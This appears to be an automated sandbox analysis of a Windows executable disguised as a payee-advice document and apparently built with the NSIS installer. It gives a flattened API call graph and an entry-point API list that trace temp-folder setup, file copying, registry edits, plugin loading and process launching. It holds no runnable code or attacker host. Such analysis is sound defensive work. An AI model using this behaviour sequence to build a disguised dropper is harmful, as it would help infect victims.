4053fe 5216->5218 5219 4055a2 TrackPopupMenu 5217->5219 5220 40558f GetWindowRect 5217->5220 5221 405407 ShowWindow 5218->5221 5222 40543b GetDlgItem SendMessageW 5218->5222 5219->5213 5223 4055bd 5219->5223 5220->5219 5224 40542a 5221->5224 5225 40541d ShowWindow 5221->5225 5222->5213 5226 405462 SendMessageW SendMessageW 5222->5226 5227 4055d9 SendMessageW 
5223->5227 5233 404164 SendMessageW 5224->5233 5225->5224 5226->5213 5227->5227 5228 4055f6 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 5227->5228 5230 40561b SendMessageW 5228->5230 5230->5230 5231 405644 GlobalUnlock SetClipboardData CloseClipboard 5230->5231 5231->5213 5232->5193 5233->5222 5234->5194 4424 402454 4425 402c44 19 API calls 4424->4425 4426 40245e 4425->4426 4427 402b1d 18 API calls 4426->4427 4428 402467 4427->4428 4429 402793 4428->4429 4430 40248b RegEnumValueW 4428->4430 4431 40247f RegEnumKeyW 4428->4431 4430->4429 4432 4024a4 RegCloseKey 4430->4432 4431->4432 4432->4429 5235 401ed4 5236 402b3a 18 API calls 5235->5236 5237 401edb 5236->5237 5238 40622d 2 API calls 5237->5238 5239 401ee1 5238->5239 5241 401ef2 5239->5241 5242 405e31 wsprintfW 5239->5242 5242->5241 4434 4022d5 4435 402305 4434->4435 4436 4022da 4434->4436 4437 402b3a 18 API calls 4435->4437 4438 402c44 19 API calls 4436->4438 4439 40230c 4437->4439 4440 4022e1 4438->4440 4447 402b7a RegOpenKeyExW 4439->4447 4441 4022eb 4440->4441 4446 402324 4440->4446 4442 402b3a 18 API calls 4441->4442 4443 4022f2 RegDeleteValueW RegCloseKey 4442->4443 4443->4446 4453 402ba5 4447->4453 4456 402322 4447->4456 4448 402bcb RegEnumKeyW 4449 402bdd RegCloseKey 4448->4449 4448->4453 4451 406254 3 API calls 4449->4451 4450 402c02 RegCloseKey 4450->4456 4454 402bed 4451->4454 4452 402b7a 3 API calls 4452->4453 4453->4448 4453->4449 4453->4450 4453->4452 4455 402c1d RegDeleteKeyW 4454->4455 4454->4456 4455->4456 4456->4446 4464 403c57 4465 403daa 4464->4465 4466 403c6f 4464->4466 4468 403dfb 4465->4468 4469 403dbb GetDlgItem GetDlgItem 4465->4469 4466->4465 4467 403c7b 4466->4467 4470 403c86 SetWindowPos 4467->4470 4471 403c99 4467->4471 4473 403e55 4468->4473 4478 401389 2 API calls 4468->4478 4472 40412f 19 API calls 4469->4472 4470->4471 4475 403cb6 4471->4475 4476 403c9e ShowWindow 4471->4476 4477 403de5 SetClassLongW 4472->4477 4474 40417b SendMessageW 4473->4474 4496 403da5 4473->4496 4503 
403e67 4474->4503 4479 403cd8 4475->4479 4480 403cbe DestroyWindow 4475->4480 4476->4475 4481 40140b 2 API calls 4477->4481 4482 403e2d 4478->4482 4484 403cdd SetWindowLongW 4479->4484 4485 403cee 4479->4485 4483 4040d9 4480->4483 4481->4468 4482->4473 4488 403e31 SendMessageW 4482->4488 4494 4040e9 ShowWindow 4483->4494 4483->4496 4484->4496 4486 403d97 4485->4486 4487 403cfa GetDlgItem 4485->4487 4493 404196 8 API calls 4486->4493 4491 403d2a 4487->4491 4492 403d0d SendMessageW IsWindowEnabled 4487->4492 4488->4496 4489 40140b 2 API calls 4489->4503 4490 4040ba DestroyWindow EndDialog 4490->4483 4495 403d2f 4491->4495 4498 403d37 4491->4498 4499 403d7e SendMessageW 4491->4499 4500 403d4a 4491->4500 4492->4491 4492->4496 4493->4496 4494->4496 4538 404108 4495->4538 4497 405f0c 18 API calls 4497->4503 4498->4495 4498->4499 4499->4486 4504 403d52 4500->4504 4505 403d67 4500->4505 4502 40412f 19 API calls 4502->4503 4503->4489 4503->4490 4503->4496 4503->4497 4503->4502 4510 40412f 19 API calls 4503->4510 4525 403ffa DestroyWindow 4503->4525 4508 40140b 2 API calls 4504->4508 4507 40140b 2 API calls 4505->4507 4506 403d65 4506->4486 4509 403d6e 4507->4509 4508->4495 4509->4486 4509->4495 4511 403ee2 GetDlgItem 4510->4511 4512 403ef7 4511->4512 4513 403eff ShowWindow KiUserCallbackDispatcher 4511->4513 4512->4513 4535 404151 EnableWindow 4513->4535 4515 403f29 EnableWindow 4518 403f3d 4515->4518 4516 403f42 GetSystemMenu EnableMenuItem SendMessageW 4517 403f72 SendMessageW 4516->4517 4516->4518 4517->4518 4518->4516 4536 404164 SendMessageW 4518->4536 4537 405eea lstrcpynW 4518->4537 4521 403fa0 lstrlenW 4522 405f0c 18 API calls 4521->4522 4523 403fb6 SetWindowTextW 4522->4523 4524 401389 2 API calls 4523->4524 4524->4503 4525->4483 4526 404014 CreateDialogParamW 4525->4526 4526->4483 4527 404047 4526->4527 4528 40412f 19 API calls 4527->4528 4529 404052 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4528->4529 4530 401389 2 API calls 4529->4530 4531 404098 
4530->4531 4531->4496 4532 4040a0 ShowWindow 4531->4532 4533 40417b SendMessageW 4532->4533 4534 4040b8 4533->4534 4534->4483 4535->4515 4536->4518 4537->4521 4539 404115 SendMessageW 4538->4539 4540 40410f 4538->4540 4539->4506 4540->4539 4541 4014d7 4542 402b1d 18 API calls 4541->4542 4543 4014dd Sleep 4542->4543 4545 4029c7 4543->4545 4762 40335a #17 SetErrorMode OleInitialize 4763 406254 3 API calls 4762->4763 4764 40339d SHGetFileInfoW 4763->4764 4835 405eea lstrcpynW 4764->4835 4766 4033c8 GetCommandLineW 4836 405eea lstrcpynW 4766->4836 4768 4033da GetModuleHandleW 4769 4033f2 4768->4769 4770 405962 CharNextW 4769->4770 4771 403401 CharNextW 4770->4771 4779 403411 4771->4779 4772 4034e6 4773 4034fa GetTempPathW 4772->4773 4837 403326 4773->4837 4775 403512 4776 403516 GetWindowsDirectoryW lstrcatW 4775->4776 4777 40356c DeleteFileW 4775->4777 4780 403326 11 API calls 4776->4780 4845 402dbc GetTickCount GetModuleFileNameW 4777->4845 4778 405962 CharNextW 4778->4779 4779->4772 4779->4778 4785 4034e8 4779->4785 4782 403532 4780->4782 4782->4777 4784 403536 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4782->4784 4783 403580 4786 403618 4783->4786 4789 403608 4783->4789 4793 405962 CharNextW 4783->4793 4788 403326 11 API calls 4784->4788 4929 405eea lstrcpynW 4785->4929 4932 4037c2 4786->4932 4792 403564 4788->4792 4875 4038b4 4789->4875 4792->4777 4792->4786 4797 40359b 4793->4797 4795 403631 4798 4056c6 MessageBoxIndirectW 4795->4798 4796 403727 4799 4037aa ExitProcess 4796->4799 4804 406254 3 API calls 4796->4804 4802 4035e2 4797->4802 4803 403647 lstrcatW lstrcmpiW 4797->4803 4801 40363f ExitProcess 4798->4801 4805 405a3d 18 API calls 4802->4805 4803->4786 4806 403663 CreateDirectoryW SetCurrentDirectoryW 4803->4806 4807 403736 4804->4807 4809 4035ee 4805->4809 4810 403686 4806->4810 4811 40367b 4806->4811 4808 406254 3 API calls 4807->4808 4812 40373f 4808->4812 4809->4786 4930 405eea lstrcpynW 4809->4930 4942 405eea lstrcpynW 
4810->4942 4941 405eea lstrcpynW 4811->4941 4815 406254 3 API calls 4812->4815 4817 403748 4815->4817 4819 403796 ExitWindowsEx 4817->4819 4824 403756 GetCurrentProcess 4817->4824 4818 4035fd 4931 405eea lstrcpynW 4818->4931 4819->4799 4822 4037a3 4819->4822 4821 405f0c 18 API calls 4823 4036c5 DeleteFileW 4821->4823 4825 40140b 2 API calls 4822->4825 4826 4036d2 CopyFileW 4823->4826 4832 403694 4823->4832 4829 403766 4824->4829 4825->4799 4826->4832 4827 40371b 4830 405d84 40 API calls 4827->4830 4828 405d84 40 API calls 4828->4832 4829->4819 4830->4786 4831 405f0c 18 API calls 4831->4832 4832->4821 4832->4827 4832->4828 4832->4831 4833 405665 2 API calls 4832->4833 4834 403706 CloseHandle 4832->4834 4833->4832 4834->4832 4835->4766 4836->4768 4838 40617e 5 API calls 4837->4838 4840 403332 4838->4840 4839 40333c 4839->4775 4840->4839 4841 405935 3 API calls 4840->4841 4842 403344 CreateDirectoryW 4841->4842 4943 405b85 4842->4943 4947 405b56 GetFileAttributesW CreateFileW 4845->4947 4847 402dff 4874 402e0c 4847->4874 4948 405eea lstrcpynW 4847->4948 4849 402e22 4850 405981 2 API calls 4849->4850 4851 402e28 4850->4851 4949 405eea lstrcpynW 4851->4949 4853 402e33 GetFileSize 4854 402f34 4853->4854 4872 402e4a 4853->4872 4855 402d1a 33 API calls 4854->4855 4857 402f3b 4855->4857 4856 4032f9 ReadFile 4856->4872 4859 402f77 GlobalAlloc 4857->4859 4857->4874 4951 40330f SetFilePointer 4857->4951 4858 402fcf 4861 402d1a 33 API calls 4858->4861 4860 402f8e 4859->4860 4865 405b85 2 API calls 4860->4865 4861->4874 4863 402f58 4866 4032f9 ReadFile 4863->4866 4864 402d1a 33 API calls 4864->4872 4868 402f9f CreateFileW 4865->4868 4867 402f63 4866->4867 4867->4859 4867->4874 4869 402fd9 4868->4869 4868->4874 4950 40330f SetFilePointer 4869->4950 4871 402fe7 4873 403062 46 API calls 4871->4873 4872->4854 4872->4856 4872->4858 4872->4864 4872->4874 4873->4874 4874->4783 4876 406254 3 API calls 4875->4876 4877 4038c8 4876->4877 4878 4038e0 4877->4878 4879 4038ce 4877->4879 4880 
405db7 3 API calls 4878->4880 4961 405e31 wsprintfW 4879->4961 4881 403910 4880->4881 4883 40392f lstrcatW 4881->4883 4885 405db7 3 API calls 4881->4885 4884 4038de 4883->4884 4952 403b8a 4884->4952 4885->4883 4888 405a3d 18 API calls 4889 403961 4888->4889 4890 4039f5 4889->4890 4893 405db7 3 API calls 4889->4893 4891 405a3d 18 API calls 4890->4891 4892 4039fb 4891->4892 4895 403a0b LoadImageW 4892->4895 4896 405f0c 18 API calls 4892->4896 4894 403993 4893->4894 4894->4890 4899 4039b4 lstrlenW 4894->4899 4903 405962 CharNextW 4894->4903 4897 403ab1 4895->4897 4898 403a32 RegisterClassW 4895->4898 4896->4895 4902 40140b 2 API calls 4897->4902 4900 403abb 4898->4900 4901 403a68 SystemParametersInfoW CreateWindowExW 4898->4901 4904 4039c2 lstrcmpiW 4899->4904 4905 4039e8 4899->4905 4900->4786 4901->4897 4906 403ab7 4902->4906 4907 4039b1 4903->4907 4904->4905 4908 4039d2 GetFileAttributesW 4904->4908 4909 405935 3 API calls 4905->4909 4906->4900 4911 403b8a 19 API calls 4906->4911 4907->4899 4910 4039de 4908->4910 4912 4039ee 4909->4912 4910->4905 4913 405981 2 API calls 4910->4913 4914 403ac8 4911->4914 4962 405eea lstrcpynW 4912->4962 4913->4905 4916 403ad4 ShowWindow LoadLibraryW 4914->4916 4917 403b57 4914->4917 4919 403af3 LoadLibraryW 4916->4919 4920 403afa GetClassInfoW 4916->4920 4963 405267 OleInitialize 4917->4963 4919->4920 4921 403b24 DialogBoxParamW 4920->4921 4922 403b0e GetClassInfoW RegisterClassW 4920->4922 4924 40140b 2 API calls 4921->4924 4922->4921 4923 403b5d 4925 403b61 4923->4925 4926 403b79 4923->4926 4924->4900 4925->4900 4928 40140b 2 API calls 4925->4928 4927 40140b 2 API calls 4926->4927 4927->4900 4928->4900 4929->4773 4930->4818 4931->4789 4933 4037d3 CloseHandle 4932->4933 4934 4037dd 4932->4934 4933->4934 4935 4037f1 4934->4935 4936 4037e7 CloseHandle 4934->4936 4971 40381f 4935->4971 4936->4935 4939 405772 71 API calls 4940 403621 OleUninitialize 4939->4940 4940->4795 4940->4796 4941->4810 4942->4832 4944 405b92 GetTickCount 
GetTempFileNameW 4943->4944 4945 403358 4944->4945 4946 405bc8 4944->4946 4945->4775 4946->4944 4946->4945 4947->4847 4948->4849 4949->4853 4950->4871 4951->4863 4953 403b9e 4952->4953 4970 405e31 wsprintfW 4953->4970 4955 403c0f 4956 405f0c 18 API calls 4955->4956 4957 403c1b SetWindowTextW 4956->4957 4958 40393f 4957->4958 4959 403c37 4957->4959 4958->4888 4959->4958 4960 405f0c 18 API calls 4959->4960 4960->4959 4961->4884 4962->4890 4964 40417b SendMessageW 4963->4964 4965 40528a 4964->4965 4968 401389 2 API calls 4965->4968 4969 4052b1 4965->4969 4966 40417b SendMessageW 4967 4052c3 OleUninitialize 4966->4967 4967->4923 4968->4965 4969->4966 4970->4955 4972 40382d 4971->4972 4973 4037f6 4972->4973 4974 403832 FreeLibrary GlobalFree 4972->4974 4973->4939 4974->4973 4974->4974 5243 40155b 5244 40296d 5243->5244 5247 405e31 wsprintfW 5244->5247 5246 402972 5247->5246 3904 4023e0 3915 402c44 3904->3915 3906 4023ea 3919 402b3a 3906->3919 3909 402793 3910 4023fe RegQueryValueExW 3911 40241e 3910->3911 3914 402424 RegCloseKey 3910->3914 3911->3914 3925 405e31 wsprintfW 3911->3925 3914->3909 3916 402b3a 18 API calls 3915->3916 3917 402c5d 3916->3917 3918 402c6b RegOpenKeyExW 3917->3918 3918->3906 3920 402b46 3919->3920 3926 405f0c 3920->3926 3923 4023f3 3923->3909 3923->3910 3925->3914 3927 405f19 3926->3927 3928 406164 3927->3928 3931 405fcc GetVersion 3927->3931 3932 406132 lstrlenW 3927->3932 3934 405f0c 10 API calls 3927->3934 3937 406047 GetSystemDirectoryW 3927->3937 3938 40605a GetWindowsDirectoryW 3927->3938 3939 40617e 5 API calls 3927->3939 3940 405f0c 10 API calls 3927->3940 3941 4060d3 lstrcatW 3927->3941 3942 40608e SHGetSpecialFolderLocation 3927->3942 3953 405db7 RegOpenKeyExW 3927->3953 3958 405e31 wsprintfW 3927->3958 3959 405eea lstrcpynW 3927->3959 3929 402b67 3928->3929 3960 405eea lstrcpynW 3928->3960 3929->3923 3944 40617e 3929->3944 3931->3927 3932->3927 3934->3932 3937->3927 3938->3927 3939->3927 3940->3927 3941->3927 3942->3927 3943 4060a6 
SHGetPathFromIDListW CoTaskMemFree 3942->3943 3943->3927 3945 40618b 3944->3945 3947 4061f4 CharNextW 3945->3947 3949 406201 3945->3949 3951 4061e0 CharNextW 3945->3951 3952 4061ef CharNextW 3945->3952 3961 405962 3945->3961 3946 406206 CharPrevW 3946->3949 3947->3945 3947->3949 3949->3946 3950 406227 3949->3950 3950->3923 3951->3945 3952->3947 3954 405e2b 3953->3954 3955 405deb RegQueryValueExW 3953->3955 3954->3927 3956 405e0c RegCloseKey 3955->3956 3956->3954 3958->3927 3959->3927 3960->3929 3962 405968 3961->3962 3963 40597e 3962->3963 3964 40596f CharNextW 3962->3964 3963->3945 3964->3962 5255 401ce5 GetDlgItem GetClientRect 5256 402b3a 18 API calls 5255->5256 5257 401d17 LoadImageW SendMessageW 5256->5257 5258 401d35 DeleteObject 5257->5258 5259 4029c7 5257->5259 5258->5259 5260 40206a 5261 402b3a 18 API calls 5260->5261 5262 402071 5261->5262 5263 402b3a 18 API calls 5262->5263 5264 40207b 5263->5264 5265 402b3a 18 API calls 5264->5265 5266 402084 5265->5266 5267 402b3a 18 API calls 5266->5267 5268 40208e 5267->5268 5269 402b3a 18 API calls 5268->5269 5270 402098 5269->5270 5271 4020ac CoCreateInstance 5270->5271 5272 402b3a 18 API calls 5270->5272 5275 4020cb 5271->5275 5272->5271 5273 401423 25 API calls 5274 402197 5273->5274 5275->5273 5275->5274 5276 40156b 5277 401584 5276->5277 5278 40157b ShowWindow 5276->5278 5279 401592 ShowWindow 5277->5279 5280 4029c7 5277->5280 5278->5277 5279->5280 5281 4024ee 5282 4024f3 5281->5282 5283 40250c 5281->5283 5284 402b1d 18 API calls 5282->5284 5285 402512 5283->5285 5286 40253e 5283->5286 5289 4024fa 5284->5289 5287 402b3a 18 API calls 5285->5287 5288 402b3a 18 API calls 5286->5288 5290 402519 WideCharToMultiByte lstrlenA 5287->5290 5291 402545 lstrlenW 5288->5291 5292 402567 WriteFile 5289->5292 5293 402793 5289->5293 5290->5289 5291->5289 5292->5293 5294 4018ef 5295 401926 5294->5295 5296 402b3a 18 API calls 5295->5296 5297 40192b 5296->5297 5298 405772 71 API calls 5297->5298 5299 401934 5298->5299 5300 402770 
5301 402b3a 18 API calls 5300->5301 5302 402777 FindFirstFileW 5301->5302 5303 40278a 5302->5303 5304 40279f 5302->5304 5305 4027a8 5304->5305 5308 405e31 wsprintfW 5304->5308 5309 405eea lstrcpynW 5305->5309 5308->5305 5309->5303 5310 4014f1 SetForegroundWindow 5311 4029c7 5310->5311 5312 403872 5313 40387d 5312->5313 5314 403881 5313->5314 5315 403884 GlobalAlloc 5313->5315 5315->5314 5316 4018f2 5317 402b3a 18 API calls 5316->5317 5318 4018f9 5317->5318 5319 4056c6 MessageBoxIndirectW 5318->5319 5320 401902 5319->5320 5321 402573 5322 402b1d 18 API calls 5321->5322 5324 402582 5322->5324 5323 4026a0 5324->5323 5325 4025c8 ReadFile 5324->5325 5326 405bd9 ReadFile 5324->5326 5327 4026a2 5324->5327 5328 402608 MultiByteToWideChar 5324->5328 5330 4026b3 5324->5330 5331 40262e SetFilePointer MultiByteToWideChar 5324->5331 5325->5323 5325->5324 5326->5324 5333 405e31 wsprintfW 5327->5333 5328->5324 5330->5323 5332 4026d4 SetFilePointer 5330->5332 5331->5324 5332->5323 5333->5323 5334 401df3 5335 402b3a 18 API calls 5334->5335 5336 401df9 5335->5336 5337 402b3a 18 API calls 5336->5337 5338 401e02 5337->5338 5339 402b3a 18 API calls 5338->5339 5340 401e0b 5339->5340 5341 402b3a 18 API calls 5340->5341 5342 401e14 5341->5342 5343 401423 25 API calls 5342->5343 5344 401e1b ShellExecuteW 5343->5344 5345 401e4c 5344->5345 5365 4026f9 5366 402700 5365->5366 5369 402972 5365->5369 5367 402b1d 18 API calls 5366->5367 5368 40270b 5367->5368 5370 402712 SetFilePointer 5368->5370 5370->5369 5371 402722 5370->5371 5373 405e31 wsprintfW 5371->5373 5373->5369 5381 1000103d 5382 1000101b 8 API calls 5381->5382 5383 10001056 5382->5383 5384 40427d lstrlenW 5385 40429c 5384->5385 5386 40429e WideCharToMultiByte 5384->5386 5385->5386 5387 402c7f 5388 402c91 SetTimer 5387->5388 5389 402caa 5387->5389 5388->5389 5390 402cf8 5389->5390 5391 402cfe MulDiv 5389->5391 5392 402cb8 wsprintfW SetWindowTextW SetDlgItemTextW 5391->5392 5392->5390 5394 4014ff 5395 401507 5394->5395 5397 40151a 
5394->5397 5396 402b1d 18 API calls 5395->5396 5396->5397 5398 401000 5399 401037 BeginPaint GetClientRect 5398->5399 5402 40100c DefWindowProcW 5398->5402 5400 4010f3 5399->5400 5404 401073 CreateBrushIndirect FillRect DeleteObject 5400->5404 5405 4010fc 5400->5405 5403 401179 5402->5403 5404->5400 5406 401102 CreateFontIndirectW 5405->5406 5407 401167 EndPaint 5405->5407 5406->5407 5408 401112 6 API calls 5406->5408 5407->5403 5408->5407 5409 401a00 5410 402b3a 18 API calls 5409->5410 5411 401a09 ExpandEnvironmentStringsW 5410->5411 5412 401a30 5411->5412 5413 401a1d 5411->5413 5413->5412 5414 401a22 lstrcmpW 5413->5414 5414->5412 5415 401b01 5416 402b3a 18 API calls 5415->5416 5417 401b08 5416->5417 5418 402b1d 18 API calls 5417->5418 5419 401b11 wsprintfW 5418->5419 5420 4029c7 5419->5420 5421 100018c1 5422 10001243 3 API calls 5421->5422 5423 100018e7 5422->5423 5424 10001243 3 API calls 5423->5424 5425 100018ef 5424->5425 5426 10001243 3 API calls 5425->5426 5428 10001931 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 5425->5428 5427 10001916 5426->5427 5429 1000191f GlobalFree 5427->5429 5430 10001280 2 API calls 5428->5430 5429->5428 5431 10001aad GlobalFree GlobalFree 5430->5431 5432 10002a43 5433 10002a5b 5432->5433 5434 100015a7 2 API calls 5433->5434 5435 10002a76 5434->5435 5436 404583 5437 404593 5436->5437 5438 4045b9 5436->5438 5439 40412f 19 API calls 5437->5439 5440 404196 8 API calls 5438->5440 5441 4045a0 SetDlgItemTextW 5439->5441 5442 4045c5 5440->5442 5441->5438 4146 405108 4147 405118 4146->4147 4148 40512c 4146->4148 4150 405175 4147->4150 4151 40511e 4147->4151 4149 405134 IsWindowVisible 4148->4149 4154 405154 4148->4154 4149->4150 4153 405141 4149->4153 4155 40517a CallWindowProcW 4150->4155 4160 40417b 4151->4160 4163 404a5e SendMessageW 4153->4163 4154->4155 4168 404ade 4154->4168 4156 405128 4155->4156 4161 404193 4160->4161 4162 404184 SendMessageW 4160->4162 4161->4156 4162->4161 4164 404a81 GetMessagePos ScreenToClient 
SendMessageW 4163->4164 4165 404abd SendMessageW 4163->4165 4166 404ab5 4164->4166 4167 404aba 4164->4167 4165->4166 4166->4154 4167->4165 4177 405eea lstrcpynW 4168->4177 4170 404af1 4178 405e31 wsprintfW 4170->4178 4172 404afb 4179 40140b 4172->4179 4176 404b0b 4176->4150 4177->4170 4178->4172 4183 401389 4179->4183 4182 405eea lstrcpynW 4182->4176 4185 401390 4183->4185 4184 4013fe 4184->4182 4185->4184 4186 4013cb MulDiv SendMessageW 4185->4186 4186->4185 5443 401f08 5444 402b3a 18 API calls 5443->5444 5445 401f0f GetFileVersionInfoSizeW 5444->5445 5446 401f36 GlobalAlloc 5445->5446 5447 401f8c 5445->5447 5446->5447 5448 401f4a GetFileVersionInfoW 5446->5448 5448->5447 5449 401f59 VerQueryValueW 5448->5449 5449->5447 5450 401f72 5449->5450 5454 405e31 wsprintfW 5450->5454 5452 401f7e 5455 405e31 wsprintfW 5452->5455 5454->5452 5455->5447 5463 1000224c 5464 100022b1 5463->5464 5465 100022e7 5463->5465 5464->5465 5466 100022c3 GlobalAlloc 5464->5466 5466->5464 5467 100016ce 5468 100016fd 5467->5468 5469 10001b3e 24 API calls 5468->5469 5470 10001704 5469->5470 5471 10001717 5470->5471 5472 1000170b 5470->5472 5474 10001721 5471->5474 5475 1000173e 5471->5475 5473 10001280 2 API calls 5472->5473 5478 10001715 5473->5478 5479 10001555 3 API calls 5474->5479 5476 10001744 5475->5476 5477 10001768 5475->5477 5480 100015cc 3 API calls 5476->5480 5481 10001555 3 API calls 5477->5481 5482 10001726 5479->5482 5483 10001749 5480->5483 5481->5478 5484 100015cc 3 API calls 5482->5484 5486 10001280 2 API calls 5483->5486 5485 1000172c 5484->5485 5487 10001280 2 API calls 5485->5487 5488 1000174f GlobalFree 5486->5488 5489 10001732 GlobalFree 5487->5489 5488->5478 5490 10001763 GlobalFree 5488->5490 5489->5478 5490->5478 4190 404b10 GetDlgItem GetDlgItem 4191 404b62 7 API calls 4190->4191 4194 404d7b 4190->4194 4192 404c05 DeleteObject 4191->4192 4193 404bf8 SendMessageW 4191->4193 4195 404c0e 4192->4195 4193->4192 4203 404e5f 4194->4203 4204 404e40 4194->4204 4208 404ddb 
4194->4208 4196 404c45 4195->4196 4197 404c1d 4195->4197 4246 40412f 4196->4246 4200 405f0c 18 API calls 4197->4200 4199 404f0b 4205 404f15 SendMessageW 4199->4205 4206 404f1d 4199->4206 4207 404c27 SendMessageW SendMessageW 4200->4207 4201 404c59 4210 40412f 19 API calls 4201->4210 4202 4050f3 4259 404196 4202->4259 4203->4199 4203->4202 4211 404eb8 SendMessageW 4203->4211 4204->4203 4213 404e51 SendMessageW 4204->4213 4205->4206 4214 404f36 4206->4214 4215 404f2f ImageList_Destroy 4206->4215 4222 404f46 4206->4222 4207->4195 4209 404a5e 5 API calls 4208->4209 4227 404dec 4209->4227 4228 404c67 4210->4228 4211->4202 4217 404ecd SendMessageW 4211->4217 4213->4203 4219 404f3f GlobalFree 4214->4219 4214->4222 4215->4214 4216 4050b5 4216->4202 4223 4050c7 ShowWindow GetDlgItem ShowWindow 4216->4223 4221 404ee0 4217->4221 4219->4222 4220 404d3c GetWindowLongW SetWindowLongW 4224 404d55 4220->4224 4232 404ef1 SendMessageW 4221->4232 4222->4216 4236 404ade 4 API calls 4222->4236 4240 404f81 4222->4240 4223->4202 4225 404d73 4224->4225 4226 404d5b ShowWindow 4224->4226 4250 404164 SendMessageW 4225->4250 4249 404164 SendMessageW 4226->4249 4227->4204 4228->4220 4231 404cb7 SendMessageW 4228->4231 4233 404d36 4228->4233 4234 404cf3 SendMessageW 4228->4234 4235 404d04 SendMessageW 4228->4235 4231->4228 4232->4199 4233->4220 4233->4224 4234->4228 4235->4228 4236->4240 4237 404d6e 4237->4202 4238 40508b InvalidateRect 4238->4216 4239 4050a1 4238->4239 4251 404978 4239->4251 4241 404faf SendMessageW 4240->4241 4242 404fc5 4240->4242 4241->4242 4242->4238 4244 405026 4242->4244 4245 405039 SendMessageW SendMessageW 4242->4245 4244->4245 4245->4242 4247 405f0c 18 API calls 4246->4247 4248 40413a SetDlgItemTextW 4247->4248 4248->4201 4249->4237 4250->4194 4252 404995 4251->4252 4253 405f0c 18 API calls 4252->4253 4254 4049ca 4253->4254 4255 405f0c 18 API calls 4254->4255 4256 4049d5 4255->4256 4257 405f0c 18 API calls 4256->4257 4258 404a06 lstrlenW wsprintfW SetDlgItemTextW 
4257->4258 4258->4216 4260 4041ae GetWindowLongW 4259->4260 4261 404237 4259->4261 4260->4261 4262 4041bf 4260->4262 4263 4041d1 4262->4263 4264 4041ce GetSysColor 4262->4264 4265 4041e1 SetBkMode 4263->4265 4266 4041d7 SetTextColor 4263->4266 4264->4263 4267 4041f9 GetSysColor 4265->4267 4268 4041ff 4265->4268 4266->4265 4267->4268 4269 404210 4268->4269 4270 404206 SetBkColor 4268->4270 4269->4261 4271 404223 DeleteObject 4269->4271 4272 40422a CreateBrushIndirect 4269->4272 4270->4269 4271->4272 4272->4261 5491 401491 5492 405194 25 API calls 5491->5492 5493 401498 5492->5493 5494 404912 5495 404922 5494->5495 5496 40493e 5494->5496 5505 4056aa GetDlgItemTextW 5495->5505 5498 404971 5496->5498 5499 404944 SHGetPathFromIDListW 5496->5499 5501 40495b SendMessageW 5499->5501 5502 404954 5499->5502 5500 40492f SendMessageW 5500->5496 5501->5498 5503 40140b 2 API calls 5502->5503 5503->5501 5505->5500 4457 402295 4458 402b3a 18 API calls 4457->4458 4459 4022a4 4458->4459 4460 402b3a 18 API calls 4459->4460 4461 4022ad 4460->4461 4462 402b3a 18 API calls 4461->4462 4463 4022b7 GetPrivateProfileStringW 4462->4463 4546 401f98 4547 40205c 4546->4547 4548 401faa 4546->4548 4551 401423 25 API calls 4547->4551 4549 402b3a 18 API calls 4548->4549 4550 401fb1 4549->4550 4552 402b3a 18 API calls 4550->4552 4556 402197 4551->4556 4553 401fba 4552->4553 4554 401fd0 LoadLibraryExW 4553->4554 4555 401fc2 GetModuleHandleW 4553->4555 4554->4547 4557 401fe1 4554->4557 4555->4554 4555->4557 4569 4062c0 WideCharToMultiByte 4557->4569 4560 401ff2 4563 402011 4560->4563 4564 401ffa 4560->4564 4561 40202b 4562 405194 25 API calls 4561->4562 4566 402002 4562->4566 4572 10001771 4563->4572 4614 401423 4564->4614 4566->4556 4567 40204e FreeLibrary 4566->4567 4567->4556 4570 4062ea GetProcAddress 4569->4570 4571 401fec 4569->4571 4570->4571 4571->4560 4571->4561 4573 100017a1 4572->4573 4617 10001b3e 4573->4617 4575 100017a8 4576 100018be 4575->4576 4577 100017c0 4575->4577 4578 100017b9 

Control-flow Graph (entry block 40335a-4033f0; rendered graph and edge list omitted)
APIs
• #17.COMCTL32 ref: 00403379
• SetErrorMode.KERNELBASE(00008001), ref: 00403384
• OleInitialize.OLE32(00000000), ref: 0040338B
  • Part of subcall function 00406254: GetModuleHandleA.KERNEL32(?,?,00000020,0040339D,00000008), ref: 00406266
  • Part of subcall function 00406254: LoadLibraryA.KERNELBASE(?,?,00000020,0040339D,00000008), ref: 00406271
  • Part of subcall function 00406254: GetProcAddress.KERNEL32(00000000,?), ref: 00406282
• SHGetFileInfoW.SHELL32(00420690,00000000,?,000002B4,00000000), ref: 004033B3
  • Part of subcall function 00405EEA: lstrcpynW.KERNEL32(?,?,00000400,004033C8,004281E0,NSIS Error), ref: 00405EF7
• GetCommandLineW.KERNEL32(004281E0,NSIS Error), ref: 004033C8
• GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe",00000000), ref: 004033DB
• CharNextW.USER32(00000000,"C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe",00000020), ref: 00403402
• GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 0040350B
• GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040351C
• lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403528
• GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040353C
• lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403544
• SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403555
• SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040355D
• DeleteFileW.KERNELBASE(1033), ref: 00403571
• OleUninitialize.OLE32(?), ref: 00403621
• ExitProcess.KERNEL32 ref: 00403641
• lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe",00000000,?), ref: 0040364D
• lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe",00000000,?), ref: 00403659
